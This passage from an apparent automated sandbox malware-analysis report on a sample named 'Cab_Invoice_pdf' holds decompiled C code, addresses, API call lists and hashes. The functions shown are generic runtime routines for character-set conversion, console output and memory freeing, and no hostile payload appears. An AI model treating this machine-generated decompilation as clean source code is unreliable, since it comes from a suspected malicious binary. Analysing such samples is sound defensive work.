				_t63 =  *0x133c008; // 0xa3433343
				_v8 = _t63 ^ _t129;
				_t124 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t120 = _a16;
				_v36 = _t120;
				if(_t124 <= 0) {
					if(_t124 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t124 = E0132CA63(_t120, _t124);
					_t67 = _v40;
					L2:
					_t93 = _a28;
					if(_t93 <= 0) {
						if(_t93 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t93 = E0132CA63(_t67, _t93);
						L7:
						_t69 = _a32;
						if(_t69 == 0) {
							_t69 =  *( *_v44 + 8);
							_a32 = _t69;
						}
						if(_t124 == 0 || _t93 == 0) {
							if(_t124 != _t93) {
								if(_t93 <= 1) {
									if(_t124 <= 1) {
										if(GetCPInfo(_t69,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t124 <= 0) {
												if(_t93 <= 0) {
													goto L36;
												} else {
													_t68 = 2;
													if(_v28 >= _t68) {
														_t109 =  &_v22;
														if(_v22 != 0) {
															_t128 = _v40;
															while(1) {
																_t117 =  *((intOrPtr*)(_t109 + 1));
																if(_t117 == 0) {
																	goto L15;
																}
																_t96 =  *_t128;
																if(_t96 <  *_t109 || _t96 > _t117) {
																	_t109 = _t109 + _t68;
																	if( *_t109 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t68 = 2;
												if(_v28 >= _t68) {
													_t110 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t118 =  *((intOrPtr*)(_t110 + 1));
															if(_t118 == 0) {
																goto L17;
															}
															_t97 =  *_t120;
															if(_t97 <  *_t110 || _t97 > _t118) {
																_t110 = _t110 + _t68;
																if( *_t110 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
									_t68 = 1;
								}
							} else {
								_push(2);
								L13:
								_pop(_t68);
							}
						} else {
							L36:
							_t122 = 0;
							_t71 = MultiByteToWideChar(_a32, 9, _v36, _t124, 0, 0);
							_v44 = _t71;
							if(_t71 == 0) {
								L5:
								_t68 = 0;
							} else {
								_t115 = _t71 + _t71;
								asm("sbb eax, eax");
								if((_t115 + 0x00000008 & _t71) == 0) {
									_t72 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t83 = _t71 & _t115 + 0x00000008;
									_t107 = _t115 + 8;
									if((_t71 & _t115 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t85 = E01320A25(_t107, _t83 & _t107);
										_v32 = _t85;
										if(_t85 == 0) {
											goto L61;
										} else {
											 *_t85 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E0132F250();
										_t85 = _t130;
										_v32 = _t85;
										if(_t85 == 0) {
											L61:
											_t95 = _v32;
										} else {
											 *_t85 = 0xcccc;
											L43:
											_t72 =  &(_t85[4]);
											_v32 = _t72;
											L45:
											if(_t72 == 0) {
												goto L61;
											} else {
												_t126 = _a32;
												if(MultiByteToWideChar(_t126, 1, _v36, _t124, _t72, _v44) == 0) {
													goto L61;
												} else {
													_t75 = MultiByteToWideChar(_t126, 9, _v40, _t93, _t122, _t122);
													_v36 = _t75;
													if(_t75 == 0) {
														goto L61;
													} else {
														_t116 = _t75 + _t75;
														_t103 = _t116 + 8;
														asm("sbb eax, eax");
														if((_t116 + 0x00000008 & _t75) == 0) {
															_t127 = _t122;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t79 = _t75 & _t116 + 0x00000008;
															_t103 = _t116 + 8;
															if((_t75 & _t116 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t127 = E01320A25(_t103, _t79 & _t103);
																_pop(_t103);
																if(_t127 == 0) {
																	goto L59;
																} else {
																	 *_t127 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E0132F250();
																_t127 = _t130;
																if(_t127 == 0) {
																	L59:
																	_t95 = _v32;
																} else {
																	 *_t127 = 0xcccc;
																	L54:
																	_t127 =  &(_t127[4]);
																	L56:
																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t93, _t127, _v36) == 0) {
																		goto L59;
																	} else {
																		_t95 = _v32;
																		_t122 = E013236EC(_t103, _v48, _a12, _v32, _v44, _t127, _v36, _t122, _t122, _t122);
																	}
																}
															}
														}
														E0132815E(_t127);
													}
												}
											}
										}
									}
								}
								E0132815E(_t95);
								_t68 = _t122;
							}
						}
					}
				}
				L63:
				E0131786A();
				return _t68;
			}





































                            0x0132d052
                            0x0132d059
                            0x0132d061
                            0x0132d064
                            0x0132d06a
                            0x0132d06d
                            0x0132d070
                            0x0132d074
                            0x0132d077
                            0x0132d07c
                            0x0132d0a3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132d07e
                            0x0132d086
                            0x0132d088
                            0x0132d08c
                            0x0132d08c
                            0x0132d091
                            0x0132d0af
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0132d093
                            0x0132d09c
                            0x0132d0b1
                            0x0132d0b1
                            0x0132d0b6
                            0x0132d0bd
                            0x0132d0c0
                            0x0132d0c0
                            0x0132d0c5
                            0x0132d0d1
                            0x0132d0de
                            0x0132d0eb
                            0x0132d0fe
                            0x00000000
                            0x0132d100
                            0x0132d102
                            0x0132d135
                            0x00000000
                            0x0132d137
                            0x0132d139
                            0x0132d13d
                            0x0132d143
                            0x0132d146
                            0x0132d148
                            0x0132d14b
                            0x0132d14b
                            0x0132d150
                            0x00000000
                            0x00000000
                            0x0132d152
                            0x0132d156
                            0x0132d160
                            0x0132d165
                            0x00000000
                            0x0132d167
                            0x00000000
                            0x0132d167
                            0x0132d165
                            0x00000000
                            0x0132d156
                            0x0132d14b
                            0x0132d146
                            0x00000000
                            0x0132d13d
                            0x0132d104
                            0x0132d106
                            0x0132d10a
                            0x0132d110
                            0x0132d113
                            0x0132d115
                            0x0132d115
                            0x0132d11a
                            0x00000000
                            0x00000000
                            0x0132d11c
                            0x0132d120
                            0x0132d12a
                            0x0132d12f
                            0x00000000
                            0x0132d131
                            0x00000000
                            0x0132d131
                            0x0132d12f
                            0x00000000
                            0x0132d120
                            0x0132d115
                            0x0132d113
                            0x00000000
                            0x0132d10a
                            0x0132d102
                            0x0132d0ed
                            0x0132d0ed
                            0x0132d0ed
                            0x00000000
                            0x0132d0ed
                            0x0132d0e0
                            0x0132d0e0
                            0x0132d0e2
                            0x0132d0e2
                            0x0132d0d3
                            0x0132d0d3
                            0x0132d0d5
                            0x0132d0d5
                            0x0132d0d5
                            0x0132d16c
                            0x0132d16c
                            0x0132d16c
                            0x0132d179
                            0x0132d17f
                            0x0132d184
                            0x0132d0a5
                            0x0132d0a5
                            0x0132d18a
                            0x0132d18a
                            0x0132d192
                            0x0132d196
                            0x0132d1f1
                            0x0132d1f3
                            0x00000000
                            0x0132d198
                            0x0132d19d
                            0x0132d19f
                            0x0132d1a1
                            0x0132d1a9
                            0x0132d1cd
                            0x0132d1d2
                            0x0132d1d7
                            0x0132d1dd
                            0x00000000
                            0x0132d1e3
                            0x0132d1e3
                            0x00000000
                            0x0132d1e3
                            0x0132d1ab
                            0x0132d1ad
                            0x0132d1b1
                            0x0132d1b6
                            0x0132d1b8
                            0x0132d1bd
                            0x0132d2d2
                            0x0132d2d2
                            0x0132d1c3
                            0x0132d1c3
                            0x0132d1e9
                            0x0132d1e9
                            0x0132d1ec
                            0x0132d1f6
                            0x0132d1f8
                            0x00000000
                            0x0132d1fe
                            0x0132d206
                            0x0132d214
                            0x00000000
                            0x0132d21a
                            0x0132d223
                            0x0132d229
                            0x0132d22e
                            0x00000000
                            0x0132d234
                            0x0132d234
                            0x0132d237
                            0x0132d23c
                            0x0132d240
                            0x0132d28c
                            0x00000000
                            0x0132d242
                            0x0132d247
                            0x0132d249
                            0x0132d24b
                            0x0132d253
                            0x0132d270
                            0x0132d27a
                            0x0132d27c
                            0x0132d27f
                            0x00000000
                            0x0132d281
                            0x0132d281
                            0x00000000
                            0x0132d281
                            0x0132d255
                            0x0132d257
                            0x0132d25b
                            0x0132d260
                            0x0132d264
                            0x0132d2c6
                            0x0132d2c6
                            0x0132d266
                            0x0132d266
                            0x0132d287
                            0x0132d287
                            0x0132d28e
                            0x0132d290
                            0x00000000
                            0x0132d2a9
                            0x0132d2a9
                            0x0132d2c2
                            0x0132d2c2
                            0x0132d290
                            0x0132d264
                            0x0132d253
                            0x0132d2ca
                            0x0132d2cf
                            0x0132d22e
                            0x0132d214
                            0x0132d1f8
                            0x0132d1bd
                            0x0132d1a9
                            0x0132d2d6
                            0x0132d2dc
                            0x0132d2dc
                            0x0132d184
                            0x0132d0c5
                            0x0132d091
                            0x0132d2de
                            0x0132d2e9
                            0x0132d2f1

                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,00000000,7FFFFFFF,?,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 0132D0F6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D179
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0132D323,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D20C
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D223
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0132D323,00000000,00000000,00000000,00000001,?,?,?,?), ref: 0132D29F
                            • __freea.LIBCMT ref: 0132D2CA
                            • __freea.LIBCMT ref: 0132D2D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 2829977744-0
                            • Opcode ID: 823513f1dc46aa5b05042edc04155cdbdfe6f82c2ecaf26268df5660bb39a0ed
                            • Instruction ID: 4fc1b87ba5e2d5526e9c9426ab74f100526de1b2710f6937ebadfe2848311d60
                            • Opcode Fuzzy Hash: 823513f1dc46aa5b05042edc04155cdbdfe6f82c2ecaf26268df5660bb39a0ed
                            • Instruction Fuzzy Hash: DD91D971E0032A9FEB25AEE8CC40EEEBBB9EF06768F148559E905E7150D735D841C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01322A10, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E01322A10(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x133c008; // 0xa3433343
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1346108 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1346108 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E01327D33(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x1346108 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E01323F5B( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t115 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t93 = E01323F5B();
						_t139 = _t139 + 0xc;
						if(_t93 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t96;
							if(_t96 != 0) {
								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
									L19:
									 *_t136 = GetLastError();
								} else {
									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t104 = 0xd;
											_v32 = _t104;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				E0131786A();
				return _t136;
			}



































                            0x01322a18
                            0x01322a1f
                            0x01322a22
                            0x01322a2a
                            0x01322a2e
                            0x01322a3a
                            0x01322a3d
                            0x01322a40
                            0x01322a47
                            0x01322a4f
                            0x01322a52
                            0x01322a58
                            0x01322a5e
                            0x01322a63
                            0x01322a65
                            0x01322a68
                            0x01322a6d
                            0x01322a77
                            0x01322a7e
                            0x01322a81
                            0x01322a88
                            0x01322a8f
                            0x01322abb
                            0x01322ae1
                            0x01322ae3
                            0x00000000
                            0x01322abd
                            0x01322ac0
                            0x01322b87
                            0x01322b93
                            0x01322b9e
                            0x01322ba3
                            0x01322ac6
                            0x01322acd
                            0x01322ad2
                            0x01322ad8
                            0x01322ade
                            0x00000000
                            0x01322ade
                            0x01322ad8
                            0x01322ac0
                            0x01322a91
                            0x01322a95
                            0x01322a98
                            0x01322a9e
                            0x01322aa0
                            0x01322aa3
                            0x01322aa7
                            0x01322ae4
                            0x01322ae7
                            0x01322ae8
                            0x01322aed
                            0x01322af3
                            0x01322af9
                            0x01322b08
                            0x01322b0e
                            0x01322b14
                            0x01322b19
                            0x01322b35
                            0x01322ba8
                            0x01322bae
                            0x01322b37
                            0x01322b3f
                            0x01322b48
                            0x01322b4e
                            0x00000000
                            0x01322b50
                            0x01322b52
                            0x01322b55
                            0x01322b6e
                            0x00000000
                            0x01322b70
                            0x01322b74
                            0x01322b76
                            0x01322b79
                            0x00000000
                            0x01322b79
                            0x01322b74
                            0x01322b6e
                            0x01322b4e
                            0x01322b48
                            0x01322b35
                            0x01322b19
                            0x01322af3
                            0x00000000
                            0x01322b7c
                            0x01322b7c
                            0x01322bb0
                            0x01322bba
                            0x01322bc2

                            APIs
                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01323185,?,00000000,?,00000000,00000000), ref: 01322A52
                            • __fassign.LIBCMT ref: 01322ACD
                            • __fassign.LIBCMT ref: 01322AE8
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 01322B0E
                            • WriteFile.KERNEL32(?,?,00000000,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B2D
                            • WriteFile.KERNEL32(?,?,00000001,01323185,00000000,?,?,?,?,?,?,?,?,?,01323185,?), ref: 01322B66
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction ID: e85fe1460474c5779a6725feafb0ecf146e591fcf20f926945536de5fbb692c8
                            • Opcode Fuzzy Hash: 9f82d53c7932f6bdb7ef92b9339c56e1d5bbbb45b6c2ef89299796072e4e38fd
                            • Instruction Fuzzy Hash: DE51C0B1A00219AFDF24DFA8DC85AEEBBF8FF09314F14455AE955E7241D730A941CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314D40, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 102COMMON
                            Download Yara Rule
                            C-Code - Quality: 56%
                            			E01314D40(void* __ecx, void* __edx, void* __eflags) {
				int* _t18;
				short* _t21;
				char* _t22;
				short* _t28;
				int* _t31;
				void* _t34;
				short* _t36;
				int* _t41;
				signed int _t42;
				char* _t44;
				int _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_t34 = __edx;
				_t44 =  *(_t46 + 0x14);
				_push(4);
				_push( &(_t44[1]));
				_t18 = E013197F8(__ecx);
				_t31 = _t18;
				_t47 = _t46 + 8;
				if(_t31 != 0) {
					_t36 = 0;
					__eflags = _t44;
					if(_t44 <= 0) {
						L17:
						_t31[_t44] = 0;
						return _t31;
					} else {
						_t41 = _t31;
						_t21 =  *(_t47 + 0x20) - _t31;
						__eflags = _t21;
						 *(_t47 + 0x20) = _t21;
						while(1) {
							_t22 =  *(_t21 + _t41);
							 *(_t47 + 0x28) = _t22;
							_t45 = MultiByteToWideChar(0xfde9, 0, _t22, 0xffffffff, 0, 0);
							__eflags = _t45;
							if(__eflags == 0) {
								break;
							}
							_t7 = _t45 + 1; // 0x1
							_push(2);
							_push(_t7);
							_t28 = E013197F8(_t7);
							_t47 = _t47 + 8;
							 *(_t47 + 0x14) = _t28;
							__eflags = _t28;
							if(__eflags == 0) {
								_push("Out of memory.");
								_push("win32_utils_from_utf8");
								goto L13;
							} else {
								__eflags = MultiByteToWideChar(0xfde9, 0,  *(_t47 + 0x1c), 0xffffffff, _t28, _t45);
								if(__eflags == 0) {
									_push("Failed to decode wchar_t from UTF-8\n");
									L12:
									_push("MultiByteToWideChar");
									L13:
									E01311860(_t34, __eflags);
									_t48 = _t47 + 8;
									 *_t41 = 0;
									_t42 = 0;
									__eflags = _t36;
									if(_t36 >= 0) {
										do {
											L01319803(_t31[_t42]);
											_t42 = _t42 + 1;
											_t48 = _t48 + 4;
											__eflags = _t42 - _t36;
										} while (_t42 <= _t36);
									}
									L01319803(_t31);
									__eflags = 0;
									return 0;
								} else {
									_t36 =  &(_t36[0]);
									_t44 =  *(_t47 + 0x1c);
									 *_t41 =  *(_t47 + 0x14);
									_t41 =  &(_t41[1]);
									__eflags = _t36 - _t44;
									if(_t36 >= _t44) {
										goto L17;
									} else {
										_t21 =  *(_t47 + 0x20);
										continue;
									}
								}
							}
							goto L18;
						}
						_push("Failed to get wchar_t buffer size.\n");
						goto L12;
					}
				} else {
					return _t18;
				}
				L18:
			}

















                            0x01314d40
                            0x01314d45
                            0x01314d49
                            0x01314d4e
                            0x01314d4f
                            0x01314d54
                            0x01314d56
                            0x01314d5b
                            0x01314d65
                            0x01314d67
                            0x01314d69
                            0x01314e43
                            0x01314e45
                            0x01314e53
                            0x01314d6f
                            0x01314d73
                            0x01314d75
                            0x01314d75
                            0x01314d77
                            0x01314d80
                            0x01314d80
                            0x01314d91
                            0x01314d9b
                            0x01314d9d
                            0x01314d9f
                            0x00000000
                            0x00000000
                            0x01314da1
                            0x01314da4
                            0x01314da6
                            0x01314da7
                            0x01314dac
                            0x01314daf
                            0x01314db3
                            0x01314db5
                            0x01314def
                            0x01314df4
                            0x00000000
                            0x01314db7
                            0x01314dcc
                            0x01314dce
                            0x01314de8
                            0x01314e00
                            0x01314e00
                            0x01314e05
                            0x01314e05
                            0x01314e0a
                            0x01314e0d
                            0x01314e13
                            0x01314e15
                            0x01314e17
                            0x01314e20
                            0x01314e23
                            0x01314e28
                            0x01314e29
                            0x01314e2c
                            0x01314e2c
                            0x01314e20
                            0x01314e31
                            0x01314e39
                            0x01314e42
                            0x01314dd0
                            0x01314dd4
                            0x01314dd5
                            0x01314dd9
                            0x01314ddb
                            0x01314dde
                            0x01314de0
                            0x00000000
                            0x01314de2
                            0x01314de2
                            0x00000000
                            0x01314de2
                            0x01314de0
                            0x01314dce
                            0x00000000
                            0x01314db5
                            0x01314dfb
                            0x00000000
                            0x01314dfb
                            0x01314d62
                            0x01314d62
                            0x01314d62
                            0x00000000

                            APIs
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,01313951,?,00000000,01313951,?), ref: 01314D95
                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 01314DC6
                            Strings
                            • Failed to get wchar_t buffer size., xrefs: 01314DFB
                            • Failed to decode wchar_t from UTF-8, xrefs: 01314DE8
                            • Out of memory., xrefs: 01314DEF
                            • win32_utils_from_utf8, xrefs: 01314DF4
                            • MultiByteToWideChar, xrefs: 01314E00
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide
                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                            • API String ID: 626452242-306716450
                            • Opcode ID: 6562478fa26fcc63d66122fd9fe350789fc62d6d7b5bc843ec3e49942ca7898c
                            • Instruction ID: 6582a99377bcf9e1854667b7a6b5f1c92d33b4cd34ed1d465d855fae31427794
                            • Opcode Fuzzy Hash: 6562478fa26fcc63d66122fd9fe350789fc62d6d7b5bc843ec3e49942ca7898c
                            • Instruction Fuzzy Hash: 6A319DB1648306ABDB206F5CAC41F6BBB98EF8071DF440139FE54A7284E775D50483A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132534A, Relevance: 10.6, APIs: 7, Instructions: 80COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E0132534A(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E0132369E(_t29, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E01320A25(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0131C998(GetLastError());
								}
							}
							E013209EB(_t40);
							_t14 = _t35;
						} else {
							E0131C998(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0131C9CE())) = 0x16;
						E01321788();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0131C9CE())) = 0x16;
				E01321788();
				return 0;
			}















                            0x0132534f
                            0x01325354
                            0x0132536e
                            0x01325371
                            0x01325373
                            0x0132538c
                            0x0132538e
                            0x01325395
                            0x01325397
                            0x013253a0
                            0x013253a1
                            0x013253a5
                            0x013253ab
                            0x013253ae
                            0x013253b0
                            0x013253ca
                            0x013253cd
                            0x013253cf
                            0x013253dc
                            0x013253e2
                            0x013253e4
                            0x013253f8
                            0x013253fa
                            0x013253fe
                            0x013253fe
                            0x013253ff
                            0x013253e6
                            0x013253ed
                            0x013253f2
                            0x013253e4
                            0x01325402
                            0x01325407
                            0x013253b2
                            0x013253b9
                            0x013253be
                            0x013253be
                            0x01325375
                            0x0132537a
                            0x01325380
                            0x01325385
                            0x01325385
                            0x00000000
                            0x0132540c
                            0x0132535b
                            0x01325361
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35849a99248079fc8140a8a2c4a265fc431476c9558e37e06b0ea5cd57eb3fd8
                            • Instruction ID: 522dd09d1df05a845b50b4d6bb4f30b863c59a9b8abeb467239bbaf4ed12d6f2
                            • Opcode Fuzzy Hash: 35849a99248079fc8140a8a2c4a265fc431476c9558e37e06b0ea5cd57eb3fd8
                            • Instruction Fuzzy Hash: 4811B772604239BBDB253F799C44AAFBAADEB81729F105618F815D7140DA7089018760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01327F23, Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01327F23(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E01327EE7(_t45, 7);
					E01327EE7(_t45 + 0x1c, 7);
					E01327EE7(_t45 + 0x38, 0xc);
					E01327EE7(_t45 + 0x68, 0xc);
					E01327EE7(_t45 + 0x98, 2);
					E013209EB( *((intOrPtr*)(_t45 + 0xa0)));
					E013209EB( *((intOrPtr*)(_t45 + 0xa4)));
					E013209EB( *((intOrPtr*)(_t45 + 0xa8)));
					E01327EE7(_t45 + 0xb4, 7);
					E01327EE7(_t45 + 0xd0, 7);
					E01327EE7(_t45 + 0xec, 0xc);
					E01327EE7(_t45 + 0x11c, 0xc);
					E01327EE7(_t45 + 0x14c, 2);
					E013209EB( *((intOrPtr*)(_t45 + 0x154)));
					E013209EB( *((intOrPtr*)(_t45 + 0x158)));
					E013209EB( *((intOrPtr*)(_t45 + 0x15c)));
					return E013209EB( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                            0x01327f29
                            0x01327f2e
                            0x01327f37
                            0x01327f42
                            0x01327f4d
                            0x01327f58
                            0x01327f66
                            0x01327f71
